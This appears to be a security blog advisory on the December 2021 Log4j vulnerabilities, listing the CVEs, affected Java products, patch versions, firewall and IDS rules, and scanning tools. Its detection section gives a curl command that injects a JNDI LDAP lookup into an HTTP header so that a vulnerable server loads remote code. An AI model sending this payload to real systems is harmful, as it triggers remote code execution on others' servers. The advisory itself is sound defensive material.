Vulnerability

Log4j V2.17.1 The Fourth CVE And News Years Countdown

RISK: CRITICAL

Last Update: December 30th 14:18 EST

CVE-2021-44832 – Fourth CVE where All versions from 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4

CVE-2021-45105 – Third CVE Upgrade to 2.17 since DoS flaw exists as log4j 2.16 and does not always protect from infinite recursion in lookup evaluation.

CVE-2021-45046 – Second CVE Upgrade to 2.16.0 to correct 2.15.0 where a minor DoS vulnerability was found.

CVE-2021-44228 – Initial CVE upgrade to 2.15 mitigation to Disable JNDI default lookups and fix Remote Code Execution.

Description

The latest CVE really does not pose an increased security risk for the majority of enterprises. You shouldn’t ignore this vulnerability however if an attacker has permission to modify the logging configuration file in my opinion you have much bigger issues. We all know that if you have access to Tomcat Manager for example the server can be used to deploy malicious payloads.

The Apache Software Foundation says that in Apache Log4j2 versions 2.14.1 and earlier “JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.”

Log4j2 open-source logging framework for Java is subject to a vulnerability which means untrusted input can result via LDAP, RMI and other JNDI endpoints in the loading and executing of arbitrary code from an untrusted source.

Cloudflare is saying it was first spotted on: 2021-12-01 04:36:50 UTC. which creates a timeline in the wild at least 9 days before publicly disclosed but some time after it was disclosed to Apache.

Many JAVA based applications could be exposed given LOG4J is a common package as listed bellow

  • Apache Tomcat
  • Apache Struts
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • ElasticSearch
  • Flume
  • Apache Dubbo
  • Logstash
  • Kafka
  • Spring-Boot-starter-log4j2

Historical CVE

  • CVE-2017-5645: For Apache log4j 2.x before 2.8.2, the log4j servers will deserialize any log events received from other applications through TCP or UDP socket servers. If a crafted binary payload is being sent using this vulnerability, it can lead to arbitrary code execution.
  • CVE-2019-17571: For Apache log4j versions from 1.2 (up to 1.2.17), the SocketServer class is vulnerable to deserialization of untrusted data, which leads to remote code execution if combined with a deserialization gadget.

Detection of Vulnerable Services

Using a simple curl statement you can replace “example.com” with the external or internal server you monitor. If your running a vulnerable version this statement will attempt to execute the “a” payload. Nessus has also released a plugin for detection and the following python script can also be utilized.

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://example.com/a}'

Known Mitigiation Strategies

Update Log4J Fixed in Versions 2.17.1, 2.12.4, and 2.3.2.

Although Apache has officially released details on the upcoming 2.17.1 release so far the fix includes 2.12.4 and 2.3.2 for older release candidates.

Nextgen Firewall

  • Palo Alto user with active Threat Protection security subscription can automatically block sessions related to this vulnerability using Threat ID 91991 (initially released using Applications and Threat content update version 8498 and further enhanced with version 8499).
  • Fortinet have released rule updates for IDS/IPS servers with further information to be provided.

F5 WAF Application Rules

  • https://support.f5.com/csp/article/K19026212

SNORT and Suricate Rules

  • 2034647
  • 2034648
  • 2034648
  • 2034649
  • 2034650
  • 2034651
  • 2034652

Outbound Traffic

  • Disable all outbound traffic from Applicaiton servers to internet is general best practice. Using Layered Security where WAF is utilized at the edge plus IPS detection should always be used to provide 2 layers of security against attacks of this nature.

Detection Methods


Yara Scanner

Download the following rules

signature-base/expl_log4j_cve_2021_44228.yar at master · Neo23x0/signature-base

Download Yara Scanner

https://github.com/VirusTotal/yara/releases/download/v4.1.3/yara-v4.1.3-1755-win64.zip

Command

yara -r expl_log4j_cve_2021_44228.yar .

Loki Scanner

Releases · Neo23x0/Loki

Binary Scanner

GitHub – logpresso/CVE-2021-44228-Scanner: Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228

Conclusions

We continue to see Critical CVE in applications services from Manage Engine CVE-2021-44515 to Exchange Server Zero day attacks. Lets asks the tough Enterprise questions

  • Is your Corporation following security best practices?
  • Is your permitter protected with Next Gen firewall with active IPS blocking Enabled?
  • Is your application layer protected with Enterprise grade WAF?
  • Do you know if Apache Struts or Log4j is present on your network? Do you keep an active list of external Applications and Librarys your enterprise has published on the internet.
  • Are you proactively patching and running emergency patches?

Reference Links

Known IOC

  • https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
  • https://logging.apache.org/log4j/2.x/security.html